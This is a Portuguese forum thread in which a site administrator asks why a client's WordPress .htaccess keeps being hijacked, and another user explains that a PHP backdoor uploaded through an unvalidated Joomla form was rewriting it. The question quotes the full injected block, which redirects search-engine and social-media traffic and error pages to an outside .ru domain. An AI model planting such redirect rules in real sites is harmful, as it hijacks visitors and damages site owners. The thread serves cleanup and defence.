O código do seu aplicativo está sendo explorado ou alguém phished / adivinhou as credenciais da sua conta. Certifique-se de que seu código wp esteja atualizado, incluindo todos os plug-ins, e certifique-se de alterar a senha da sua conta.
Estou perplexo. Meu site wordpress clientes continua tendo seu arquivo .htaccess hackeado. Ele está adicionando código para redirecionar todo o tráfego dos mecanismos de pesquisa para sites diferentes. Ele continua mudando o domínio para o qual está redirecionando. Atualmente (não visite este site! Prime-vermond.ru)
Alterei as senhas do ftp, as senhas do administrador do wordpress, atualizei todos os plug-ins, removi os plugins não utilizados, alterei as permissões de arquivo do arquivo .htaccess para o 444.
Estou achando que pode ser uma exploração de servidor? O site do cliente é hospedado com godaddy. Enviei um e-mail para eles várias vezes, aguardando uma resposta no meu último ticket de suporte.
Eu fiz uma busca em todos os arquivos procurando pelo que pode ter código malicioso, mas não consegui nada. Estou assumindo que eles têm o código base64 codificado e estão usando o eval para executá-lo.
Alguma idéia de como encontrar melhor um arquivo ruim modificado? Estou com uma perda agora = /
Abaixo está o código inteiro sendo adicionado ao arquivo .htaccess
ErrorDocument 400 http://prime-vermond.ru/trast/index.php
ErrorDocument 401 http://prime-vermond.ru/trast/index.php
ErrorDocument 403 http://prime-vermond.ru/trast/index.php
ErrorDocument 404 http://prime-vermond.ru/trast/index.php
ErrorDocument 500 http://prime-vermond.ru/trast/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]
Defina todas as opções de registro possíveis. Espere que isso aconteça novamente. Em seguida, anote o horário da última modificação no arquivo e, em seguida, verifique os logs de acesso / erro para ver se algo incomum estava acontecendo naquele momento.
Eu estava com o mesmo problema e esta foi a nossa solução.
Antecedentes
Houve uma falha de segurança em uma de nossas instalações de cms, no nosso caso foi uma versão alpha do joomla 1.6 usada para testes que ficou sem o cuidado ... é irrelevante qual versão alpha foi, há um release e muito versão segura (1.7) agora: P.
O furo foi gerado pelo código de upload do arquivo / imagem. Esta parte do cms não validou nada, então qualquer um pode fazer upload de qualquer tipo de arquivo (um arquivo php no nosso caso) e executar externamente chamando o arquivo.
O arquivo php (no nosso caso) foi enviado para o diretório images, especificamente a pasta que todos os artigos tem acesso para upload, no nosso caso e essa instalação em particular foi domain.com/images/stories / .
Este código php escaneado para todos os arquivos de configuração do apache (.htaccess) e adicionar as regras que você descreve acima. O salto de código sobe um por um até que não seja possível ter acesso de leitura ou gravação, adicionando este código a qualquer arquivo .htaccess encontrado por nível ou criando-o se não existir.
Evento se você excluir ou substituir os arquivos .htaccess, eles serão criados ou modificados novamente (a cada hora no nosso caso) executando o código php.
Solução
Começamos a rastrear os arquivos usando a data de modificação e filtrando os arquivos modificados mais recentemente. Usamos os arquivos .htaccess (modificados recentemente) como breadcrumbs para encontrar a fonte.
Se você tiver acesso ao shell, isso será mais fácil, caso contrário, verifique na última pasta modificada, que você encontrará um arquivo .htaccess dentro de cada subpasta. Você basicamente acabará com alguns arquivos php com data recente e provavelmente com permissões executáveis para acesso público (0606 ou similar).
Se você tentar baixar esse código, seu antivírus aparecerá com um aviso, no nosso caso, a Avira exibirá um aviso para o Trojan - Backdoor PHP / C99shell.B, então não se incomode.
Mas se você está tão curioso, mude a extensão para outra coisa e / ou carregue-a para baixá-la ... ou desative seu antivírus por um segundo, mas isso depende de você.
De qualquer forma, quando você encontrar este (s) arquivo (s), exclua-os e atualize o sistema ou os desinstale (como fizemos) se precisar preencher a lacuna de segurança.
Espero que isso ajude alguém! : D